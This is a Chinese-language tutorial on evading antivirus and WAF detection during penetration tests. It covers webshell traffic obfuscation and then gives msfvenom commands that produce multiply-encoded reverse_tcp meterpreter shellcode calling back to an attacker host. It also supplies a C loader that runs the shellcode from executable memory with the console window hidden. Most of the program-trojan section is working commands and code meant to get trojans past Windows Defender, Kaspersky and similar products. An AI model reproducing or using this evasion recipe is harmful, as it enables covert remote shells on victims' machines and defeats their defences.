免杀

免杀技术全称为反杀毒技术Anti Anti- Virus(AV)简称“免杀”，它指的是一种能使病毒木马免于被杀毒软件查杀的技术。由于免杀技术的涉猎面非常广，其中包含反汇编、逆向工程、系统漏洞等黑客技术。其内容基本上都是修改病毒、木马的内容改变特征码，从而躲避了杀毒软件的查杀。

在实际的渗透过程中，目标机器上一般会有杀毒软件。如Windows Defender、360安全卫士、腾讯电脑管家、卡巴斯基等，并且还会装有各种WAF(安全狗、D盾等)。我们的木马只要一上传到目标机器，就会被杀毒软件给查杀了。所以，木马免杀就是我们需要考虑的一个问题了。包括web端脚本木马的免杀，系统端程序木马的免杀。

脚本木马的免杀

Web端木马一般是中国菜刀一句话木马、中国蚁剑马、冰蝎马、还有各种脚本的大马。Web端木马的查杀一般是WAF通过分析流量来进行截断。在WAF的规则里面有这些木马的流量特征，只要WAF匹配到了木马的流量特征，就会对木马请求的流量进行截断丢弃。所以，Web端木马免杀实质就是要对木马通信流量做混淆，以达到WAF匹配不到该木马流量的目的。目前，像中国菜刀、中国蚁剑这种木马，其通信流量是很容易被WAF给检测到的。而冰蝎是目前最流行的Web木马，其通过动态二进制加密流量，可以躲避很多WAF的查杀。但是也有一些文章关于分析冰蝎流量特征的：流量加密又怎样？多种姿势检测“冰蝎” 、冰蝎动态二进制加密WebShell基于流量侧检测方案

程序木马的免杀

程序木马一般指的是Windows系统下的exe木马，通过执行程序反弹一个MSF或CS的shell。MSF和CS默认生成的木马会被杀毒软件查杀。所以，这就需要对它们生成的木马进行免杀处理了。

MSF木马的免杀

MSF下输入，生成免杀shellcode

msfvenom -p windows/meterpreter/reverse_tcp_rc4 -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > /root/shellcode.c

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=x.x.x.x LPORT=8888 -e x86/shikata_ga_nai -i 15 -b '\x00\' PrependMigrate=true PrependMigrateProc=svchost.exe -f c > /root/shellcode.c

这里的 payload 选择 windows/meterpreter/reverse_tcp，LHOST和LPORT分别填VPS的地址和MSF监听的端口，-e x86/shikata_ga_nai -i 15是用x86/shikata_ga_nai 编码 15 次(建议编码12次以上)，而 PrependMigrate=true PrependMigrateProc=svchost.exe 使这个程序默认会迁移到 svchost.exe 进程。

会生成 shellcode.c 文件，打开该文件如图所示：

然后在VS中新建一个C++项目，我这里在VS2012中新建一个c++的win32项目，然后将下面的代码复制进去，再将shellcode.c里面的那些复制到shellcode的位置。

#include<stdio.h>
#include<windows.h>

#pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
unsigned char shellcode[]= (这里填shellcode)
void main(){
     LPVOID Memory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
     memcpy(Memory, shellcode, sizeof(shellcode));
    ((void(*)())Memory)();
}

如下，点击生成解决方案，之后会生成一个exe程序